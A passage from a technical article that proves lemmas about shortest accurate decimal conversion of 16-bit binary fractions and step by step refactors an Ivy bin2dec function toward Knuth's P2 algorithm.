but <math><mrow><mo stretchy=false>(</mo><mn>2</mn><mi>n</mi><mo>±</mo><mn>1</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>5</mn></mrow></msup><mo>=</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mn>2</mn><mi>n</mi><mo>±</mo><mn>1</mn><mo stretchy=false>)</mo><mo>·</mo><mn>5</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>12</mn></mrow></msup></mrow></math> is an odd number divided by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>12</mn></msup></mrow></math>,
which cannot be an integer.
The contradiction proves that the endpoints cannot be exact decimals of 5 digits or fewer.
By the <a href="#5digit">Five-Digit Lemma</a>, the endpoints must also not be
shortest accurate correctly rounded decimals.
</div>
<div class=lemma id=truncating>
<p>
<b><i>Truncating Lemma</i></b>. For <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math>, the accuracy interval contains at most one <math><mi>p</mi></math>-digit decimal.
If it does contain one, that decimal is
<math><msub><mrow><mo>⌊</mo><mrow><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌋</mo></mrow><mi>p</mi></msub></math>, the <math><mi>p</mi></math>-digit truncation of the interval’s upper endpoint.
<p>
<i>Proof</i>. The <a href="#rounding">Rounding Lemma</a> established that the accuracy interval contains at most one <math><mi>p</mi></math>-digit decimal.
<p>
Let <math><mrow><MI>𝑚𝑖𝑛</MI><mo>=</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> and <math><mrow><MI>𝑚𝑎𝑥</MI><mo>=</mo><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>, so the accuracy interval is <math><mrow><mo stretchy=false>[</mo><MI>𝑚𝑖𝑛</MI><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><MI>𝑚𝑎𝑥</MI><mo stretchy=false>)</mo></mrow></math>.
Any <math><mi>p</mi></math>-digit decimal in that interval must also be in the narrower interval using <math><mi>p</mi></math>-digit endpoints<div class=math><math display=block><mrow><mrow><mo>[</mo><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub><mo>]</mo></mrow><mn>.</mn></mrow></math></div>
<p>
This new interval is strictly narrower because, by the <a href="#endpoint">Endpoint Lemma</a>, <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> are not themselves <math><mi>p</mi></math>-digit decimals.
<p>
If <math><mrow><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math>, the interval is empty.
Otherwise, it clearly contains its upper endpoint, proving the lemma.
</div>
<p>
The <a href="#rounding">Rounding Lemma</a> and <a href="#truncating">Truncating Lemma</a> combine
to prove that when <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math> and the accuracy interval contains any <math><mi>p</mi></math>-digit decimal,
then it contains the single <math><mi>p</mi></math>-digit decimal<div class=math><math display=block><mrow><msub><mrow><mo>⌈</mo><mrow><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌉</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>[</mo><mrow><mi>f</mi><mphantom class='vphantom'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></mphantom></mrow><mo>]</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>⌊</mo><mrow><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mn>.</mn></mrow></math></div>
<p>
The original <code>bin2dec</code> was written like this:
<pre class='language-ivy'>)op bin2dec
-- out --
op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while 1
d = p round f
:if (min <= d) and (d < max)
:ret p digits d * 10**p
:end
p = p + 1
:end
</pre>
<p>
By the <a href="#5digit">Five-Digit Lemma</a>, we know that the loop terminates
in the fifth iteration, if not before.
Let’s move that fifth iteration down after the loop,
written as an unconditional return.
That leaves the loop body handling only the short conversions:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
d = p round f
:if (min <= d) and (d < max)
:ret p digits d * 10**p
:end
p = p + 1
:end
p digits (p round f) * 10**p
</pre>
<pre class='language-ivy'>check 'rounding bin2dec refactored'
-- out --
✅ rounding bin2dec refactored
</pre>
<p>
Next we can apply the <a href="#truncating">Truncating Lemma</a> to the loop body:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
:if (p ceil min) <= (p floor max)
:ret p digits (p floor max) * 10**p
:end
p = p + 1
:end
p digits (p round f) * 10**p
</pre>
<pre class='language-ivy'>check 'truncating bin2dec'
-- out --
✅ truncating bin2dec
</pre>
<p>
This version of <code>bin2dec</code> is much closer to <i>P2</i>,
although not yet visibly so.
<a class=anchor href="#premultiplication"><h2 id="premultiplication">Premultiplication</h2></a>
<p>
Next we need to apply a basic optimization.
The expressions <code>p ceil min</code>, <code>p trunc max</code>,
and <code>p round f</code> hide repeated multiplication
and division by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
We can avoid those by multiplying <math><MI>𝑚𝑖𝑛</MI></math>, <math><MI>𝑚𝑎𝑥</MI></math>, and <math><mi>f</mi></math> by <math><mn>10</mn></math> on each iteration
instead.
<p>
As an intermediate step, let’s write the multiplications by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> explicitly,
changing <code>p ceil x</code> to <code>(ceil x * 10**p) / 10**p</code> and so on:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
:if ((ceil min * 10**p) / 10**p) <= ((floor max * 10**p) / 10**p)
:ret p digits ((floor max * 10**p) / 10**p) * 10**p
:end
p = p + 1
:end
p digits ((round f * 10**p) / 10**p) * 10**p
</pre>
<pre class='language-ivy'>check 'multiplied bin2dec'
-- out --
✅ multiplied bin2dec
</pre>
<p>
Next, we can simplify away all the divisions by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
In the comparison,
not dividing both sides by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>
leaves the result unchanged,
and the other divisions are immediately re-multiplied by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>.
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while p <= 4
:if (ceil min * 10**p) <= (floor max * 10**p)
:ret p digits (floor max * 10**p)
:end
p = p + 1
:end
p digits (round f * 10**p)
</pre>
<pre class='language-ivy'>check 'simplified'
-- out --
✅ simplified
</pre>
<p>
Finally, we can replace the multiplication by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>
with multiplying <math><mi>f</mi></math>, <math><MI>𝑚𝑖𝑛</MI></math>, and <math><MI>𝑚𝑎𝑥</MI></math> by <math><mn>10</mn></math>
each time we increment <math><mi>p</mi></math>:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
f = 10 * f
min = 10 * min
max = 10 * max
:while p <= 4
:if (ceil min) <= (floor max)
:ret p digits floor max
:end
p = p + 1
f = 10 * f
min = 10 * min
max = 10 * max
:end
p digits round f
</pre>
<pre class='language-ivy'>check 'premultiplied'
-- out --
✅ premultiplied
</pre>
<a class=anchor href="#collecting_digits"><h2 id="collecting_digits">Collecting Digits</h2></a>
<p>
At this point the only important difference between Knuth’s <i>P2</i>
and our current <code>bin2dec</code> is that <i>P2</i> computes one digit
per loop iteration instead of computing them all
from a single integer when returning.
As we saw above, <code>bin2dec</code> is walking along the
decimal form of <math><MI>𝑚𝑖𝑛</MI></math>, <math><mi>f</mi></math>, and <math><MI>𝑚𝑎𝑥</MI></math>
until they diverge,
at which point it can return an answer.
Intuitively, since the walk continues only while
the digits of all decimals in the accuracy interval agree,
it is fine to collect one digit per step along the walk.
<p>
To help prove that intuition more formally, we need the following law of floors,
which Knuth also uses.
For all integers <math><mi>a</mi></math> and <math><mi>b</mi></math> with <math><mrow><mi>b</mi><mo>></mo><mn>0</mn></mrow></math>:<div class=math><math display=block><mrow><mrow><mo>⌊</mo><mfrac><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>+</mo><mi>a</mi></mrow><mi>b</mi></mfrac><mo>⌋</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mfrac><mrow><mphantom><mo stretchy=false>⌊</mo></mphantom><mi>x</mi><mo>+</mo><mi>a</mi><mphantom><mo stretchy=false>⌋</mo></mphantom></mrow><mi>b</mi></mfrac><mo>⌋</mo></mrow><mn>.</mn></mrow></math></div>
<p>
Now we are ready to prove the necessary lemma.
<div class=lemma id=collection>
<p>
<b><i>Digit Collection Lemma</i></b>.
Let <math><mrow><MI>𝑚𝑖𝑛</MI><mo>=</mo><mi>f</mi><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> and <math><mrow><MI>𝑚𝑎𝑥</MI><mo>=</mo><mi>f</mi><mo>+</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>.
For <math><mrow><mi>p</mi><mo>≥</mo><mn>1</mn></mrow></math>, the <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></math>-digit decimal <math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub></math> has <math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></math> as its leading digits:<div class=math><math display=block><mrow><msub><mrow><mo>⌊</mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub><mn>.</mn></mrow></math></div>
<p>
Furthermore, for <math><mrow><mi>p</mi><mo>=</mo><mn>4</mn></mrow></math>, if <math><mrow><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math> then the <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></math>-digit decimal <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub></math> has
<math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></math> as its leading digits:<div class=math><math display=block><mrow><msub><mrow><mo>⌊</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub><mn>.</mn></mrow></math></div>
<p>
<i>Proof</i>.
For the first half, we can prove the result for any <math><mrow><mi>p</mi><mo>≥</mo><mn>1</mn></mrow></math> and any <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math>, not just <math><mrow><mi>x</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI></mrow></math>:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><msub><mrow><mo>⌊</mo><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>(</mo><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>1</mn><mn>0</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>)</mo></mrow><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mspace width='1em' /></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mrow><mspace width='0.3em' /><mtext>and</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[law</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floors]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
For the second half, <math><mrow><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math>
expands to <math><mrow><msub><mrow><mo>⌈</mo><mrow><mi>f</mi><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>+</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math>,
which implies <math><mi>f</mi></math> is <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> away in both directions
from an exact <math><mi>p</mi></math>-digit decimal:
<math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>≤</mo><msub><mrow><mo>{</mo><mi>f</mi><mo>}</mo></mrow><mi>p</mi></msub><mo><</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>,
or equivalently <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>≤</mo><mrow><mo>{</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>}</mo></mrow><mo><</mo><mn>1</mn><mo>−</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>.
Note in particular that since <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>4</mn></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>></mo><mn>1/20</mn></mrow></math>,
<math><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>+</mo><mn>1/20</mn></mrow><mo>⌋</mo></mrow><mo>=</mo><mrow><mo>⌊</mo><mrow><MI>𝑚𝑎𝑥</MI><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow></mrow></math>.
<p>
Now:<div class=math><math display=block><mtable><mtr><mtd><msub><mrow><mo>⌊</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>(</mo><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>1</mn><mn>0</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>)</mo></mrow><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>[</mo><mrow></mrow><mo>]</mo></mrow><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msub><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mo stretchy=false>(</mo><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>+</mo><mn>½</mn><mo stretchy=false>)</mo><MO>/</MO><mn>10</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[law</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floors]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>+</mo><mn>1/20</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><MI>𝑚𝑎𝑥</MI><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[noted</mtext><mspace width='0.3em' /><mtext>above]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><msub><mrow><mo>⌊</mo><mrow></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
(As an aside, this result is not a fluke of 16-bit binary fractions and <math><mrow><mi>p</mi><mo>=</mo><mn>4</mn></mrow></math>.
For any <math><mi>b</mi></math>-bit binary fraction, there is an accurate, correctly rounded <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></math>-digit decimal for <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn><mo>=</mo><mrow><mo>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow><mo>⌉</mo></mrow></mrow></math>,
because <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mi>p</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>></mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>. That implies <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mo stretchy=false>(</mo><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn><mo stretchy=false>)</mo></mrow></msup><mo>></mo><mn>1/20</mn></mrow></math>.)
</div>
<p>
The Digit Collection Lemma proves the correctness of saving one digit per iteration
and using that sequence as the final result.
Let’s make that change.
Here is our current version:
<pre class='language-ivy'>)op bin2dec
-- out --
op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
f = 10 * f
min = 10 * min
max = 10 * max
:while p <= 4
:if (ceil min) <= (floor max)
:ret p digits floor max
:end
p = p + 1
f = 10 * f
min = 10 * min
max = 10 * max
:end
p digits round f
</pre>
<p>
Updating it to collect digits, we have:
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
f = 10 * f
min = 10 * min
max = 10 * max
d = ()
:while p <= 4
d = d, (floor max) mod 10
:if (ceil min) <= (floor max)
:ret d
:end
p = p + 1
f = 10 * f
min = 10 * min
max = 10 * max
:end
d, (round f) mod 10
</pre>
<pre class='language-ivy'>check 'collecting digits'
-- out --
✅ collecting digits
</pre>
<p>
This program is very close to <i>P2</i>.
All that remains are straightforward optimizations.
<a class=anchor href="#change_of_basis"><h2 id="change_of_basis">Change of Basis</h2></a>
<p>
The first optimization is to remove one of the three multiplications
in the loop body,
using the fact that <math><MI>𝑚𝑖𝑛</MI></math>, <math><mi>f</mi></math>, and <math><MI>𝑚𝑎𝑥</MI></math>
are linearly dependent.
If it were up to me, I would keep <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math>
and derive <math><mrow><mi>f</mi><mo>=</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑛</MI><mo>+</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>)</mo><mn>/2</mn></mrow></math> as needed,
but to match <i>P2</i>, we will instead keep
<math><mrow><mi>s</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI></mrow></math> and <math><mrow><mi>t</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI><mo>−</mo><MI>𝑚𝑖𝑛</MI></mrow></math>,
